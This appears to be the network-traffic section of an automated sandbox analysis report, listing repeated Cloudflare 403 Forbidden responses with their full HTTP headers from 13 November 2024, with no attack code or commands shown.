            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:21:47 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HjccpWFZ2%2BSO3q7Tf0NB4hxSNVvPs5%2FO0GPYhl3V%2FGZ40642403UL%2B81Ktxplc4LLHKemvBRWZxon68%2BvaPxzfDMxNOuSd0hN4djUztdDAO4fNxgMs4Q2K2iZEIGe4e1"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e2070b00bc1e375-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=152280&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1167&delivery_rate=18737&cwnd=32&unsent_bytes=0&cid=dc5a5657835f4ce6&ts=561&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:21:48 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zew1z8nhqT7Mps836AToGZCOSuKUIhmI%2BkmFNSyvpeVX7pbAZqOU8cc4NM0GdP8qcy769dILlYhLYo8msyz74AJlYk1UH%2BQX4RxLBXN6SWpGTSt1dKAit3bP7gjNP81W"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e2070b759fbe7bb-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1182&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=2494401&cwnd=251&unsent_bytes=0&cid=e116614cf5528425&ts=458&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:21:50 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H9RBqCEpsJKUB%2FQrKMYVUwOqrqSTQo2vXTrKhY2HbSTd5GJRD5rQo%2Fb1tC8afRJv%2FbJZQ033hPMPDmKlz%2FeYorlRTsBOSIWlT%2BgnSq5eNI6MOjvSGoI%2BGufFKlfiAjTs"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e2070c07f6fe38e-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=148683&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1167&delivery_rate=18751&cwnd=32&unsent_bytes=0&cid=5395202ae9657594&ts=837&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:21:52 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iNrGzA4RClqk3Zu5u%2FMf8hLl1SIFqqSMfqaf%2BIEm8wZIgoUm11bHGdri1SJFcFXrgR5z1bhzpXXCyDDHPELuB28zw72BszNWuIjjs5EydDGVTfRoySMFuYnbBDxz6X9O"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e2070cb49c0f62d-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=139803&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2827&recv_bytes=1167&delivery_rate=22149&cwnd=32&unsent_bytes=0&cid=04e37b94cd00d38d&ts=723&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:21:55 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5E10ETFR%2BTlXuEai8SejHu6VpoufOU8kUaplQ6%2FvUBi56yf9nJiOlj0GVIj%2F%2B1Kr4gOb1I9bjFuAM2AAD5nLCFdETvP6p5bYL67UxhgjkCVZfg7CYxtCLtvvf3sDEo4S"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e2070e12e0ad75f-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=143441&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2827&recv_bytes=1167&delivery_rate=19733&cwnd=32&unsent_bytes=0&cid=23631287cfa01ef7&ts=740&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:21:57 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8x9n4JZicwJdQHhf44iZq62bQR4PclbBYS0htN0z0UmCSMSHiqp2QJ4PjYCKKEj5xA3y%2BznPyo7blneijvou0nJg8laRd2zTyoIYi1rSovLNVoukMKJ3Gf%2Bvvs5%2BRK5h"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e2070eb2e12deb5-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=130660&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1167&delivery_rate=22172&cwnd=32&unsent_bytes=0&cid=f28166e97db29f7b&ts=668&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:21:59 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TMaY3Vd5xWzms0rNmLkSR80nBpc8uNQbOBXENpzh4PsVuG9NKeyli6BcFwKQWmf3mLGSAbNJ%2BeMUoIu9I%2BET5sEZWs9C1u5paPlZP%2Bx%2BQE4%2FhKeMzruVobkNwNui1coO"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e2070f55841ca1f-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=160357&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=20599&cwnd=32&unsent_bytes=0&cid=0a46d277ad3e968c&ts=742&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:22:00 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gQD624mIiNghgpFyZzAJprJzLc%2FnDTRsb%2F9vcol2RdUwLvH1obq%2F2iNyGPlpoANo9JUvTVepMdcZuMUyJha%2FxnNBAUhibILuNXTSjsT4a2fwkn5kJXMW%2BiELaIrFARHN"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e2070fe6846c9ac-IADalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=39041&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1167&delivery_rate=74193&cwnd=32&unsent_bytes=0&cid=2777bdb7e1b369c5&ts=279&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:22:01 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GL2Q%2FbhasOF6DcdYDAG22sB6BgF7M1fiSewuc5IKjkh720Apo6m72liNiuOrGCtTwEKZTRgw3k2zrRV%2Fnasdf1DHW0tE%2Bx%2BJ%2BKIbjEoULnDAIcmci%2FmwoNyMzwLjmhtr"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e2071049970c958-IADalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=41232&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=70258&cwnd=32&unsent_bytes=0&cid=c2dd190e565dc61d&ts=278&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:22:02 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1r2nLgGaylcA0qilBncljS4QWx9udQXuiUu0umAnEBz8XwZLVHWX2w%2FByQfOFetFPg95t7b9vT3QEp8XEvQQsnV4OH76bKcvhibOFumd2xbFh0zFM9%2FL5QL50bTapSIG"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e20710a29e56c6f-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1121&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1167&delivery_rate=2623188&cwnd=251&unsent_bytes=0&cid=c8c2661e3f37bc44&ts=434&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:22:03 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Kf6QbVzs01IjXub4ChxAKfDqBBewWhxpj0OU4jKpQURmVJpn%2FkeNDPTSkJ5WYbRWttQkV2j4W7SFGjaaxTjmDMpibkjGIzNHqoLpOIQ081l8i8qbbyZHDqzmX7ishTPl"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e207110ae07e9bd-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1386&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=1937123&cwnd=251&unsent_bytes=0&cid=2093097d31608b02&ts=397&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:22:04 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T3fn6QlD2ADnShiWkE7w%2BJgQac5zJ%2BB6rhtjX0EQfbKg2CxsmZjEIDRBGDtgykuPhApt6AecT3sXIMu8UticN5FHLEAbb78PBgAa1vUAN3SE9AloGRkEJc1%2B9KsAhO4N"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e20711a8cf3e391-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=137358&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1167&delivery_rate=20796&cwnd=32&unsent_bytes=0&cid=91d7355ee9d871b5&ts=679&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:22:07 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lJVKZW4WVYHSwB3cEEmLlOaCV0NZl%2F207pk4vzqookWLiCiuoS3tVCo81D9CazJPEQWgAioJCt4bpFvoKO99GOCXYfupemqmmIhRmo89yzWRJATKduvwPjTzHtguyxXl"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e207128add6f6c1-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=129983&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=22284&cwnd=32&unsent_bytes=0&cid=aba79aad9062ef68&ts=1523&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:22:08 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IB5NDGGVo3QHHbPb3wYUOOJsJ7BntS7XQYNbHsQOlk9FJnD0bNMKpm%2BZ0RliYCh2bvZqyFBityTt2PBaLHwnpGIZPxhrFncE%2F13DBsEx2%2FDl5osV8T9uSV2E2g%2Bc071z"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e207132da6a736e-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=144636&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1167&delivery_rate=20037&cwnd=32&unsent_bytes=0&cid=333774c6181703ba&ts=806&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:22:10 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z3k%2FFgQG5RN8Zh34Ryei8ARZBOyZpwKDrnJe07HXlaZUkY5rC25aLsW85I65t%2FzBNiO03ASrrnlNMavmXKlagT5f%2BT4XrRVK6btd9vXeMJ7%2BUENpagHji1%2FoNm0IeM0N"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e20713bae1728e8-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1195&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1167&delivery_rate=2258970&cwnd=241&unsent_bytes=0&cid=b9f830ac4404c89f&ts=412&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:22:11 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lE99fMUywD0D83ClWp8fkDocta8SIrOUqVJhbllZK8BOalTHQb2le%2B6FpN%2Fpfa3RfRRL%2BnJiRsMJo1t4tqAzWiwr1FRvRquLMzp7tg4gsBbOecOQfbosDT7%2BnuBXBpnb"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e20714488bce381-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=137933&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1167&delivery_rate=21153&cwnd=32&unsent_bytes=0&cid=947b1b9a7ade8918&ts=624&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:22:13 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vBtSPqmxyrDyJkwix5qrnt1vDvxLIih5%2BzmEa8Mpg26g5%2FRfxNfvqAevPswy1rH37yK9PPgZOftMqPWbbuuFJr4o%2FpRf1w0GjVs2bTqc9xu5Ty1mkm4dbJXT%2B3egor2x"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e20714e1cd97343-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=159109&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1167&delivery_rate=19007&cwnd=32&unsent_bytes=0&cid=d108ffc8d6860c68&ts=744&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:22:14 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tvSmXj%2F%2FqmB6eitwB0UhijrFrICaGR%2FWE06adn4uaNGIw872uHPkLIeDMAH8JT%2FnqCUnadLM748brKiJAGQ5iaqZPJ40m%2B2pD3pwRXVYPgCIU5tJ%2BhKvHNcfekodJbq5"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e2071582e11d75c-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=130440&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1167&delivery_rate=22173&cwnd=32&unsent_bytes=0&cid=79abd2e80f78800c&ts=811&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:22:16 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0oLqfR3iLDMGNOiUQ2gOoNu%2BetsYhNLbtJ5e11e3MkZa9AmZrDwdn02mP1zuSr9C9fsl%2FBrmK3TxagTdZTzw2XR8amlG%2F%2F%2Fp%2BWvS%2ByqaBU%2FGQ%2BxgpaQCYHqMs7xPYn4Y"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e207162b8d68072-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=130311&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=22228&cwnd=32&unsent_bytes=0&cid=6e9b253a75976fe3&ts=710&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:22:17 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cStJcZhAMkzdJIeXYFhmbgRIS0hVWpDULUOP%2BXC9Q8iVBG9pbLYnwz5VzmxR%2FIiBUwtqkIkkRCFg4Kkz8Xr649eEYsAPsp4aiF79HW2gmtZ8aqOMOpjtvpZNgeEOOes6"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e20716ab9e2e83f-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1690&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1167&delivery_rate=1678840&cwnd=251&unsent_bytes=0&cid=26728fb0c55359b4&ts=439&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:22:18 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hZkCJJz9GHb7NR2zmjo8DpZbGZClUPv7r6uth0raAbl2ijQpuhJLfIMkAn4D4Rm1%2Fld4v3esqTUXqlLt1TZfSIWrULQQBychNAqmdgp4iblnkEo5vq2t0sI9%2BbMjXcfB"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e2071716ed12cb2-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1540&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=1857601&cwnd=251&unsent_bytes=0&cid=1247669daad8c299&ts=394&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:22:20 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WH5Airkvd6EM7%2FL8EiezsrnbczJvlTaEFxVCvRBhsNDb0KMmvWHs3egnJa1MtE2W3iFHgpflnqDtJuSM0DzyeleOhuUTd7W8FoIixWSDFawxtopb7k7dhzfET8r2D0HQ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e20717a3d55f611-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=161599&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1167&delivery_rate=16773&cwnd=32&unsent_bytes=0&cid=6608eb3e6b33cf5f&ts=811&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:22:22 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SrhKCms9rG%2FoJ%2B%2F9gGRAc00MgCaOhXMiMoizs0uOMxRFCwOVgK5hy%2Fq%2BMNerNqPMw8R%2B91XqU%2BS60k5sRHw7zL9FYy5UyPrthbT5DbwHns3kBhe%2FKzLtMWXur9OxHXWG"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e207184aca71da7-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=137510&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=21048&cwnd=32&unsent_bytes=0&cid=3bba51ff7b12d286&ts=756&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:22:23 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nHYC3VgTFsavj47x5Ipq2yZSQTrs2q%2BhmAjDIjGnjkvL%2B1MjN0Pb9pm30O4X4QuSTBIioZKOovDW1oP7ZYcRoY1WTV5Zt0ZrqNTUUM4ep%2FBit0p%2FgOt%2BQdciG5HGwaxK"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e20718ec87cd761-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=134973&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1167&delivery_rate=22055&cwnd=32&unsent_bytes=0&cid=5b8874c85e3848f9&ts=547&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:22:25 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2a1oFCT3lljdO7TIzVzNTehfzuohZWgRmd68L8poYRkSm2q%2F62yJdxR8x32WeAEuHDUdx05%2FpobZRlPwP0p%2BPZWY7nxmneM40a4rSDP0u%2FYT8z5Oth1lBquHxDjPiI5%2B"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e207199ee15d75c-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=132863&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2827&recv_bytes=1167&delivery_rate=21475&cwnd=32&unsent_bytes=0&cid=dd1e6a571e8d3ab3&ts=747&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:22:26 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M1Br7FOZ151Tv30JiSJIA%2BG69PshIZ4krip%2ByRctCjYM7F7xrak0Lgeq18xYHGIFZynO2m6IuBlu2zMNakmI01SWLVI6vTaHouhlcVcN%2Bv1MJNV25QUJUDzMvyCssOTu"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e2071a20fed2cda-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1190&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1167&delivery_rate=2399337&cwnd=251&unsent_bytes=0&cid=d6a04af6bf06d8e1&ts=445&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:22:27 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mgN0FB79osoJyRci%2FeCvE1W7OI%2B%2F6ihZO%2FePWO0VnjQcFYBRypV436ZfXkKOC5CPZwhl49g8PjWsbGF%2BxZqLoZ3cMRqwBIdl37fY%2Bg0HMOYaVWfbqzdNxdd058WX5muj"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e2071aaf830d788-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=140398&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=20792&cwnd=32&unsent_bytes=0&cid=eb26554afb95e4d0&ts=524&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:22:28 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rcFAKmcPK%2FfaSbJkFjXc640Ez8Q5wgYPphAlYKHZ5uIXdo%2FtTNbsqqNBXSX3bPma%2BslqctQEWENEYZgYxaDNRGRcRu7%2B6GHcSF%2Fbr%2BYeFHUQeMIvujiItHzCgwUDbF%2FJ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e2071b1bb5a2e2d-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1172&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1167&delivery_rate=2327974&cwnd=251&unsent_bytes=0&cid=5f04bb50528df183&ts=310&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:22:30 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pG1ab5j64LTO5VlvQFPJ9hpdQ7ApwPNJeHya0C0Jny%2BU73gy%2BJDUpKt%2B6hC7C2wAitunGRWqVOCU3UHLyt6Kr1kcqzjsyhy6JkeXwIClmX%2Fmg4Dnm3RW56d%2Bfcz%2F2g2Z"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e2071b9b8a9d789-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=136298&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1167&delivery_rate=21590&cwnd=32&unsent_bytes=0&cid=11014f91d1b0694a&ts=501&x=0"
